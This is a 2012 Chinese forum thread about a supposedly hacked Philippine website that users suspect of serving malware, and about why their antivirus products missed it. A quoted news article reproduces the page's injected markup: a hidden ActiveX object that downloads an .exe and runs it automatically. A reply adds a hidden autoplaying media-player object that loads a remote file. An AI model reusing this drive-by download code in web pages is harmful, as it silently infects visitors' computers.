www.pei.net.ph 这个网站被人挂马了，为什么金山没报啊？

草木田

www.pei.net.ph 这个网站被人挂马了，为什么金山没报啊？

这几天很多人说这个是菲律宾的网站被中国红客攻破了……我一时好奇就点进去了，突然又看见其他人说这个网站是骗人的，而且被挂马了，为什么金山没报啊？

草木田

听说小红伞也挂了，不知道说报挂马的人用的是什么杀软……难道是卡巴……

草木田

请注意，红客攻击菲官网有猫腻 作者：李兴国　日期：2012年05月04日　来源：大河新闻网
--------------------------------------------------------------------------------


笔者是一个引退的老黑客，今天听说菲律宾官方网站被黑，于是进去看了看。



疑点1.

      笔者进行了GOOGLE搜索和百度搜索，发现没有任何搜索引擎以前的收录记录，试想一个国家的网站，访问量应该很大，而且从这个网站运作，应该就被搜索引擎收录过，笔者发现了上次快照更新时间已经是昨天了。那么，一个国家的机要网站，在发现自己被黑后一天都没人处理，难道他们国家没有技术人员了吗



疑点2.
           笔者通过查询了源代码和主机地址，发现网站http://lamitan.gov.ph/服务器放置地在美国。??
然后该网站还被挂了马。试想自己黑了给那么多华人看，攻击的人需要挂马害自己人吗，显示这个事情有猫腻。我们查看了源文件，发现了这样一段代码：

<BODY><OBJECT ID="*ActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="*ActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://www.sulu.gov.ph/admin/cal/135pk.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>



疑点3.

      我们下载了这个135pk.exe文件  上传到了查毒网，全部显示为病毒。而且如果是菲律宾官方挂的，也不用自动隐藏下载打开吧，文件有350KB 也不像是什么插件之类的。攻击的网站也不是菲律宾政府官网，而真正的官网应该是：www..gov.ph

然后我们在网上查到了.ph的菲律宾域名80元即可注册购买，因此。该事件在没有得到论证以前请没有经验的用户不要去打开。被钓鱼就麻烦了。




以上三个疑点说明  有人故意做了假网站，跟随菲律宾能源网站被黑一事在自己谋利。谋什么利呢，我们进群发现群管理不断发内容招人。招学员之类的。这个.....不用继续往下说了吧



本文仅代表作者个人观点，与大河新闻网无关。如有异议，请联系我们，QQ：1164942608。

草木田

悲剧……金山什么都查不出来……

360就更别提了……

00315

草木田 发表于 2012-5-8 12:37
请注意，红客攻击菲官网有猫腻 作者：李兴国　日期：2012年05月04日　来源：大河新闻网
---------------- ...

VALUE="http://special.yunnan.cn/feature4/att/site2/20110514/1078d2c3328a0f3898bc4e.mp3

现在是这样啊，没看到你那个

草木田

00315 发表于 2012-5-8 12:44
VALUE="http://special.yunnan.cn/feature4/att/site2/20110514/1078d2c3328a0f3898bc4e.mp3

现在是 ...

预计改了……我手贱啊……没事乱点……这下还要全盘查杀了，还不知道能不能杀出来，据说卡巴是一点开网页就报马了……

<META content="MSHTML 6.00.2900.5921" name=GENERATOR><OBJECT id=PTMediaPlayer style="WIDTH: 0px; HEIGHT: 0px" classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6><PARAM NAME="URL" VALUE="http://special.yunnan.cn/feature4/att/site2/20110514/1078d2c3328a0f3898bc4e.mp3"><PARAM NAME="rate" VALUE="1"><PARAM NAME="balance" VALUE="0"><PARAM NAME="currentPosition" VALUE="0"><PARAM NAME="defaultFrame" VALUE=""><PARAM NAME="playCount" VALUE="8"><PARAM NAME="autoStart" VALUE="-1"><PARAM NAME="currentMarker" VALUE="0"><PARAM NAME="invokeURLs" VALUE="-1"><PARAM NAME="baseURL" VALUE=""><PARAM NAME="volume" VALUE="100"><PARAM NAME="mute" VALUE="0"><PARAM NAME="uiMode" VALUE="full"><PARAM NAME="stretchToFit" VALUE="-1"><PARAM NAME="windowlessVideo" VALUE="0"><PARAM NAME="enabled" VALUE="-1"><PARAM NAME="enableContextMenu" VALUE="-1"><PARAM NAME="fullScreen" VALUE="0"><PARAM NAME="SAMIStyle" VALUE=""><PARAM NAME="SAMILang" VALUE=""><PARAM NAME="SAMIFilename" VALUE=""><PARAM NAME="captioningID" VALUE=""><PARAM NAME="enableErrorDialogs" VALUE="0"><PARAM NAME="_cx" VALUE="0"><PARAM NAME="_cy" VALUE="0"></OBJECT></HEAD>

JuMin

360、金山、Just Internet Security都没报，用的猎豹

limy

还是不试了，小心点好

6Zn

金山360都不报...可能没有问题哦

munchen

金山是根据黑名单的，所以呢，没人举报就报不了